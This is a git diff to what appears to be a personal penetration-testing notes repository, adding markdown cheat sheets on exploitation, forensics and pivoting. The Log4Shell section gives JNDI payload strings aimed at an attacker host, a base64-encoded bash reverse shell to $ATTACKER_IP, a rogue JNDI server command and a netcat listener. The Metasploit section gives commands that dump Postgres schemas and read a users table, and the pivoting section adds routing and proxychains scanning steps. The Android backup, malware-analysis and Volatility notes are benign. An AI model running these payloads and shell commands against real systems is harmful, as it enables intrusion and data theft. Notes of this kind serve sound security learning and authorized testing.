diff --git a/Exploits/Java/Log4Shell.md b/Exploits/Java/Log4Shell.md index 9768e5e..0e9cc5d 100644 --- a/Exploits/Java/Log4Shell.md +++ b/Exploits/Java/Log4Shell.md @@ -131,3 +131,35 @@ ${${::-j}ndi:rmi://attackerendpoint.com/} SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" 10.10.90.21210.10.90.212 ``` + +## Tipps, Tricks & other Tools + +* Use tcpdump to catch a possible connection +```sh +tcpdump -i port 389 +``` + * While the payload may look like this +```java +"${jndi:ldap://$ATTACKER_IP/check}" +``` + +### Use Veracode's Tools + +* Clone [veracode's rogue-jndi](https://github.com/veracode-research/rogue-jndi) and build jar with maven +```sh +cd rogue-jndi +mvn package +``` +* Prepare a reverse shell +```sh +echo 'bash -c bash -i >& /dev/tcp/$ATTACKER_IP/4711 0>&1' | base64 +``` +* Run the server +```sh +java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,}|{base64,-d}|{bash,-i}" --hostname "$ATTACKER_IP" +``` +* Select and use the payload from the displayed strings +* Catch the reverse shell with something like netcat +```sh +nc -lvnp 4711 +``` diff --git a/Exploits/Web/WASM.md b/Exploits/Web/WASM.md new file mode 100644 index 0000000..3f277dc --- /dev/null +++ b/Exploits/Web/WASM.md @@ -0,0 +1,12 @@ +# Web Assembly + +## Debugger + +Use live debuggin capabilities of [Cetus](https://github.com/Qwokka/Cetus.git). Install it through chrome://extensions. After the installation, Cetus is located in the dev tools as a tab + +### Cetus Search function + +* Search for modified values and get their address values +* Do a differential search -> search once without any value followed by a search where the operator (LT, NE, GT) is changed, still without a value in the search field. + + diff --git a/Forensics/Android.md b/Forensics/Android.md new file mode 100644 index 0000000..d32db1c --- /dev/null +++ b/Forensics/Android.md @@ -0,0 +1,8 @@ +# Android + +## Android Backups + +* Restore a backup by making a tar file out of it via +```sh +( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 backup.ab ) | tar xfvz +``` diff --git a/Forensics/Malware.md b/Forensics/Malware.md new file mode 100644 index 0000000..957dfda --- /dev/null +++ b/Forensics/Malware.md @@ -0,0 +1,9 @@ +# Malware + +## Tools + +[Detect is Easy | DIE](https://github.com/horsicq/Detect-It-Easy) + +* Analyze with `capa ` +* Unpack with `upx` +* Re-analyze after deleting the cache `del .viv` diff --git a/Forensics/Volatility.md b/Forensics/Volatility.md index 3809f95..fc08f46 100644 --- a/Forensics/Volatility.md +++ b/Forensics/Volatility.md @@ -56,6 +56,7 @@ volatility -f windows.vadyarascan * Dump memory map ```sh volatility -f windows.memmap.Memmap --pid --dump +volatility -f windows.dumpfiles --pid ``` * Dump and scan files diff --git a/Miscellaneous/Metasploit.md b/Miscellaneous/Metasploit.md index 4d8c381..30a6303 100644 --- a/Miscellaneous/Metasploit.md +++ b/Miscellaneous/Metasploit.md @@ -12,6 +12,7 @@ * __Post__ postexploitation ## Notes + * Search via scope ```sh search type:auxiliary @@ -26,10 +27,12 @@ run -z * Flush via `unset all` ## Sessions + * `background` or `ctrl+z` * Foreground via `sessions -i ` ## Scanning + * Portscan ```sh search portscan @@ -41,6 +44,7 @@ search portscan * HTTP version `scanner/http/http_version` ## Database + * Start postgres * `msfdb init` * `db_status` @@ -50,11 +54,27 @@ search portscan * Show `services` * Set RHOST values via `hosts -R` +### Database Operations + +* Dump schemas +```sh +use auxiliary/scanner/postgres_schemadump +run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres +``` + +* Select table +```sh +use auxiliary/admin/postgres/postgres_sql +run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres sql='select * from users' +``` + ## Exploits + * `show targets` * `show payloads` ## Reverse Shells + * Multihandler, set options ```sh use exploit/multi/handler @@ -66,6 +86,7 @@ use multi/http/apache_mod_cgi_bash_env_exec ``` ## Post Exploitation + * `load kiwi` * `load python` * Windows @@ -82,6 +103,7 @@ use multi/http/apache_mod_cgi_bash_env_exec * `use post/linux/gather/hashdump` ## Other Meterpreter stuff + * Staged and in disguise running as another servicename ``` getpid diff --git a/Post Exploitation/Pivoting.md b/Post Exploitation/Pivoting.md index 9e97431..95c7293 100644 --- a/Post Exploitation/Pivoting.md +++ b/Post Exploitation/Pivoting.md @@ -197,6 +197,7 @@ portfwd add -l 22 -p 22 -r 127.0.0.1 run get_local_subnets background route add 10.1.1.0 255.255.255.0 1 +route add 172.10.0.1/32 -1 route print ``` * Or use `load auto_add_route` from [rapid7's documentation](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/) @@ -219,6 +220,11 @@ run use auxiliary/server/socks_proxy ``` * Set proxychain on attacker accordingly +```sh +run srvhost=127.0.0.1 srvport=9050 version=4a +curl --proxy socks4a:localhost:9050 +proxychains -q nmap 10.10.47.11 +``` ### rpivot